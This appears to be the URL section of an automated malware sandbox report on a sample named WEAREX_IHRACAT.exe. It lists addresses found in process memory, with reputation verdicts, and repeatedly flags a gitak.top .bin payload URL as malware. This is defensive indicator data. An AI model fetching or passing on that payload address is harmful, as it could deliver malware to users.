      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin5WEAREX_IHRACAT.exe, 00000002.00000003.5988266502.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197590543.000000000287D000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093636332.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302765402.000000000287D000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6199353892.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620738937.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6305027978.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410480994.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653418336.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515602395.000000000287A000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/A~WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin)WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.bin6WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin0WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binM~WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/dmAaHCQMI79.binDWEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binNJWEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bine~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDWEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binWEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binY~WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://www.gopher.ftp://ftp.WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/W~WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/o~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binRWEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/Y~WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binRWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdWEAREX_IHRACAT.exe, 00000002.00000001.1798696574.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/dmAaHCQMI79.binXWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/K~vWEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/e~WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binKWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin-~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binXWEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bino~WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214WEAREX_IHRACAT.exe, 00000002.00000001.1798696574.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
